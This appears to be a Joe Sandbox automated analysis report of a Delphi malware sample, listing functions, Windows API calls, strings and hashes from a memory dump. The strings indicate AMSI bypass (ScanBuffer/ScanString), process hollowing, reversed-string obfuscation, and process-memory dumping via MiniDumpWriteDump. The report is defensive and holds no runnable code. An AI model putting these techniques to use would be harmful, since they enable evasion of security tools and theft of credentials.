Part of subcall function 02EC895C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02EC898A
Part of subcall function 02EC895C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize), ref: 02EC89C6

Strings

advapi32, xrefs: 02ECA70A
BCryptRegisterProvider, xrefs: 02ECA5A0
BCryptVerifySignature, xrefs: 02ECA578
UacScan, xrefs: 02EC8E77, 02EC908F, 02EC968C, 02EC9A88, 02EC9BFC, 02ECA3A6, 02ECA83E
NtSetSecurityObject, xrefs: 02ECA894
MiniDumpWriteDump, xrefs: 02ECA719
ntdll, xrefs: 02ECA62A, 02ECA63E, 02ECA6F6, 02ECA899, 02ECA8AD
sppc, xrefs: 02EC937A
ScanBuffer, xrefs: 02EC8ED0, 02EC8F58, 02EC92F3, 02EC9408, 02EC94A6, 02EC97DF, 02EC9966, 02EC9AF9, 02EC9CDE, 02EC9DF3, 02EC9FB1, 02ECA121, 02ECA294, 02ECA488, 02ECA6A6, 02ECA7EC
dbgcore, xrefs: 02ECA71E, 02ECA732
MiniDumpReadDumpStream, xrefs: 02ECA72D
ScanString, xrefs: 02EC8E06, 02EC8FB1, 02EC915F, 02EC9588, 02EC976E, 02EC98F5, 02EC9D82, 02EC9F40, 02ECA0B0, 02ECA223, 02ECA50E, 02ECA5BB
I_QueryTagInformation, xrefs: 02ECA705
UacInitialize, xrefs: 02EC9036, 02EC9397, 02EC9517, 02EC961B, 02EC9A17, 02EC9B8B, 02ECA335
bcrypt, xrefs: 02ECA57D, 02ECA591, 02ECA5A5
OpenSession, xrefs: 02EC8DAD, 02EC91D0, 02EC9282, 02ECA654, 02ECA79A
NtOpenProcess, xrefs: 02ECA8A8
Initialize, xrefs: 02EC90EE, 02EC96FD, 02EC9884, 02EC9C6D, 02EC9ECF, 02ECA03F, 02ECA1B2, 02ECA417, 02ECA748
NtReadVirtualMemory, xrefs: 02ECA625
SLGetLicenseInformation, xrefs: 02EC9363
NtOpenObjectAuditAlarm, xrefs: 02ECA639, 02ECA6F1
BCryptQueryProviderRegistration, xrefs: 02ECA58C

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: Thread$ContextLibraryMemoryVirtual$AddressAllocateCreateFreeLoadProcProcessResumeUserWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 3519912188-51457883
Opcode ID: 75de197b5073a2ca6fcb7229d0d074760a8a66974f16ab165be32ac19dfca336
Instruction ID: 1c33839bf513d2b9beccf864060819e22500605c008844c0acdae27220b745dd
Opcode Fuzzy Hash: 75de197b5073a2ca6fcb7229d0d074760a8a66974f16ab165be32ac19dfca336
Instruction Fuzzy Hash: 0CE20335A8015C9BDB16FBA4E991BCF73BAAF84300F20D1A5F405AB355DA30AE46CF51

Function 02EC8D72 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON

Download Yara Rule

APIs

Part of subcall function 02EC8798: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02EC8824

GetThreadContext.KERNEL32(00000000,02F37424,ScanString,02F373A8,02ECA940,UacInitialize,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,UacInitialize,02F373A8), ref: 02EC9607

Part of subcall function 02EC7A3C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02EC7AAF

Strings

advapi32, xrefs: 02ECA70A
BCryptRegisterProvider, xrefs: 02ECA5A0
BCryptVerifySignature, xrefs: 02ECA578
UacScan, xrefs: 02EC8E77, 02EC908F, 02EC968C, 02EC9A88, 02EC9BFC, 02ECA3A6, 02ECA83E
NtSetSecurityObject, xrefs: 02ECA894
MiniDumpWriteDump, xrefs: 02ECA719
ntdll, xrefs: 02ECA62A, 02ECA63E, 02ECA6F6, 02ECA899, 02ECA8AD
sppc, xrefs: 02EC937A
ScanBuffer, xrefs: 02EC8ED0, 02EC8F58, 02EC92F3, 02EC9408, 02EC94A6, 02EC97DF, 02EC9966, 02EC9AF9, 02EC9CDE, 02EC9DF3, 02EC9FB1, 02ECA121, 02ECA294, 02ECA488, 02ECA6A6, 02ECA7EC
dbgcore, xrefs: 02ECA71E, 02ECA732
MiniDumpReadDumpStream, xrefs: 02ECA72D
ScanString, xrefs: 02EC8E06, 02EC8FB1, 02EC915F, 02EC9588, 02EC976E, 02EC98F5, 02EC9D82, 02EC9F40, 02ECA0B0, 02ECA223, 02ECA50E, 02ECA5BB
I_QueryTagInformation, xrefs: 02ECA705
UacInitialize, xrefs: 02EC9036, 02EC9397, 02EC9517, 02EC961B, 02ECA335
bcrypt, xrefs: 02ECA57D, 02ECA591, 02ECA5A5
OpenSession, xrefs: 02EC8DAD, 02EC91D0, 02EC9282, 02ECA654, 02ECA79A
NtOpenProcess, xrefs: 02ECA8A8
Initialize, xrefs: 02EC90EE, 02EC96FD, 02EC9884, 02EC9C6D, 02EC9ECF, 02ECA03F, 02ECA1B2, 02ECA417, 02ECA748
NtReadVirtualMemory, xrefs: 02ECA625
SLGetLicenseInformation, xrefs: 02EC9363
NtOpenObjectAuditAlarm, xrefs: 02ECA639, 02ECA6F1
BCryptQueryProviderRegistration, xrefs: 02ECA58C

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: AllocateContextCreateMemoryProcessThreadUserVirtual
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 4055342639-51457883
Opcode ID: fd0c5e3c7405c38e6e6415d1698528268b4bfa759a6c0c6240525fb4f1706bf5
Instruction ID: 1d8be876c9520c0a67e486d9da3988c8274f543463050b95c8d64a60d6d4a12a
Opcode Fuzzy Hash: fd0c5e3c7405c38e6e6415d1698528268b4bfa759a6c0c6240525fb4f1706bf5
Instruction Fuzzy Hash: F1E21335A8015C9BDB16FBA4E991BCF73BAAF84300F20D1A5F405AB355DA30AE46CF51

Function 02EB5908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,02EB738C,02EB0000,02EDE790), ref: 02EB5925
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02EB593C
lstrcpynA.KERNEL32(?,?,?), ref: 02EB596C
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02EB738C,02EB0000,02EDE790), ref: 02EB59D0
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02EB738C,02EB0000,02EDE790), ref: 02EB5A06
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02EB738C,02EB0000,02EDE790), ref: 02EB5A19
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02EB738C,02EB0000,02EDE790), ref: 02EB5A2B
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02EB738C,02EB0000,02EDE790), ref: 02EB5A37
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02EB738C,02EB0000), ref: 02EB5A6B
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02EB738C), ref: 02EB5A77
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02EB5A99

Strings

kernel32.dll, xrefs: 02EB5920
GetLongPathNameA, xrefs: 02EB5933
\, xrefs: 02EB5A49

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: c0d6da8a856cf813bf7e8bf6fad14356469c744d53507c0ee786984b279b86f9
Instruction ID: 9a8c834fb6f90d4ca66fe4e91d9a4edc453123bc91ef97462182f4c6ff75ca3d
Opcode Fuzzy Hash: c0d6da8a856cf813bf7e8bf6fad14356469c744d53507c0ee786984b279b86f9
Instruction Fuzzy Hash: B0419E72D80219AFDB12DFE8CC88ADFB3BDAF09354F5495A5A158E7241E730DA448F60

Function 02EB5BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02EB5BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02EB5BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02EB5BFB
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02EB5C26
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02EB5C6D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02EB5C7D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02EB5CA5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02EB5CB5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02EB5CDB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02EB5CEB

Strings

Software\Borland\Delphi\Locales, xrefs: 02EB5B38
Software\Borland\Locales, xrefs: 02EB5AFC, 02EB5B1A

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
Instruction ID: da56317d1b0fce9b12ad2f09363764660d522e2163a66a564f4128882a189acd
Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
Instruction Fuzzy Hash: 4431C771E8026C2AEB27DAB4CC45FDF77AE9F04384F4491B1A648E6080D7749E888F50

Function 02EC84D8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02EC81DC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02EC824C,?,?,00000000,?,02EC7A8E,ntdll,00000000,00000000,02EC7AD3,?,?,00000000), ref: 02EC821A
Part of subcall function 02EC81DC: GetModuleHandleA.KERNELBASE(?), ref: 02EC822E

Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 02EC8549

Strings

yromeMlautriVtcetorPtN, xrefs: 02EC84F3
ntdll, xrefs: 02EC8520

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryProtectVirtual
String ID: ntdll$yromeMlautriVtcetorPtN
API String ID: 3897345246-351734974
Opcode ID: e04d083fbec31cbee075077dd50a73a372adf2588ca14c098e0b0f05aab23f40
Instruction ID: 54677376531dbdadc7eff72ee5c78bed49ec8109132570ff457c23b89e14e585
Opcode Fuzzy Hash: e04d083fbec31cbee075077dd50a73a372adf2588ca14c098e0b0f05aab23f40
Instruction Fuzzy Hash: 0701DBB5680208AFEB06EFE4DE51E9BB7EEEB48700F619454B904D7640D670A911CB64

Function 02EB7FE2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02EB8005

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 5a0fadd8cffa65dcf0b47958c8d1c95365879bf8add663325a1dec14a0d6913b
Instruction ID: c439e505fb6d9d574d1315f0530c9df4b542b022920bc6631fefa212c1d6a40f
Opcode Fuzzy Hash: 5a0fadd8cffa65dcf0b47958c8d1c95365879bf8add663325a1dec14a0d6913b
Instruction Fuzzy Hash: 8D11C0B5E00209AF9B45CFA9CC819FFF7F9EFC9300B54C569A505E7254E6719A018B90

Function 02EBA7D4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02EBA7F2

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 509c5edacaf9aea4394e0ed0c27ececf9e7872cb5fcc7e478168e04a53ee32f2
Instruction ID: a41299858d5e63defd3c61a57ba5c1f878ba246361a592d1a6f1766b1e66e62e
Opcode Fuzzy Hash: 509c5edacaf9aea4394e0ed0c27ececf9e7872cb5fcc7e478168e04a53ee32f2
Instruction Fuzzy Hash: ADE0D832B4021417DB12A6689C84DF7725D9F5C310F00D27ABE05C73C5EDB09D404AE4

Function 02EBB79C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,02EDD106,00000000,02EDD11E), ref: 02EBB7AA

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 26c94c1a18f849967491dcd529a9c5ae7ac16ff30fcdea560201b6cf5adf0d9a
Instruction ID: 3e00b3c6efb9f1fced8b807d3ff7d8fdb0c02b61510514f06ed1c2123955eff4
Opcode Fuzzy Hash: 26c94c1a18f849967491dcd529a9c5ae7ac16ff30fcdea560201b6cf5adf0d9a
Instruction Fuzzy Hash: C7F017749853018FD380DF2AE44665677E9FF88704F889D2CE998CB380E7359454CF52

Function 02EBA820 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02EBBE82,00000000,02EBC09B,?,?,00000000,00000000), ref: 02EBA833

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 037d4bc53f8d63c223699879a68f10b0c110be8fc1968dbb48098bc23aaf63a2
Instruction ID: 991fb0b4ae79f549e0efab2275e72d99c3652459ca10318f0a0961389be472f0
Opcode Fuzzy Hash: 037d4bc53f8d63c223699879a68f10b0c110be8fc1968dbb48098bc23aaf63a2
Instruction Fuzzy Hash: E6D05E6234D2602AEA11925A2D88DFB5EECCEC57A1F00913EBA88CA211D6108C0696B5

Function 02EB921C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 02EB9220

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: c4b3f0c93823539839d01daad2c09e6f11a765adec9aabbdebd76e5b504f9237
Instruction ID: 027b725e336406cebab2775e0b045aee2db91fc1308823bdd052a6099b5ca1c1
Opcode Fuzzy Hash: c4b3f0c93823539839d01daad2c09e6f11a765adec9aabbdebd76e5b504f9237
Instruction Fuzzy Hash: 09A01280444C2001814033280C025B530445C10A20FC4474078F8402D4F91E01204097

Function 02EB20C4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Function 02EB6772 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97db7c171adaf5f6b17a37d048c6500dd7ac2a3872893b6015d22a75fb85e175
Instruction ID: dda4fdc4a28627ed8baa5e68949c46705323a9e4c1f7061f57993a6d02d36306
Opcode Fuzzy Hash: 97db7c171adaf5f6b17a37d048c6500dd7ac2a3872893b6015d22a75fb85e175
Instruction Fuzzy Hash:

Function 02EBD2A4 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02EBD2AD

Part of subcall function 02EBD278: GetProcAddress.KERNEL32(00000000), ref: 02EBD291

Strings

VarXor, xrefs: 02EBD3AD
VarIdiv, xrefs: 02EBD355
VarSub, xrefs: 02EBD313
VarCyFromStr, xrefs: 02EBD431
VarDiv, xrefs: 02EBD33F
VarMul, xrefs: 02EBD329
VarNot, xrefs: 02EBD2E7
VarR4FromStr, xrefs: 02EBD3EF
VarDateFromStr, xrefs: 02EBD41B
VarI4FromStr, xrefs: 02EBD3D9
oleaut32.dll, xrefs: 02EBD2A8
VarBstrFromCy, xrefs: 02EBD45D
VarCmp, xrefs: 02EBD3C3
VarOr, xrefs: 02EBD397
VarAdd, xrefs: 02EBD2FD
VarAnd, xrefs: 02EBD381
VarMod, xrefs: 02EBD36B
VarNeg, xrefs: 02EBD2D1
VarBstrFromDate, xrefs: 02EBD473
VarBstrFromBool, xrefs: 02EBD489
VariantChangeTypeEx, xrefs: 02EBD2BB
VarBoolFromStr, xrefs: 02EBD447
VarR8FromStr, xrefs: 02EBD405

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 1c2180758eaa02175f0635e5a8d48ccff6e3b8ab4c33bf862aedda759059efca
Instruction ID: 13867706e725be740e56b5b0651f4738d253bcc667decd90620105597f09cefd
Opcode Fuzzy Hash: 1c2180758eaa02175f0635e5a8d48ccff6e3b8ab4c33bf862aedda759059efca
Instruction Fuzzy Hash: DA410CE1AC924C9B561B7B6D7C024B7F7DFEE447603A0F52AB5088B264D920EC51CE29

Function 02EC6EE8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 02EC6EEE
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02EC6EFF
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02EC6F0F
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02EC6F1F
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02EC6F2F
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02EC6F3F
GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02EC6F4F

Strings

CoSuspendClassObjects, xrefs: 02EC6F49
CoResumeClassObjects, xrefs: 02EC6F39
CoAddRefServerProcess, xrefs: 02EC6F19
CoInitializeEx, xrefs: 02EC6F09
CoCreateInstanceEx, xrefs: 02EC6EF9
ole32.dll, xrefs: 02EC6EE9
CoReleaseServerProcess, xrefs: 02EC6F29

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
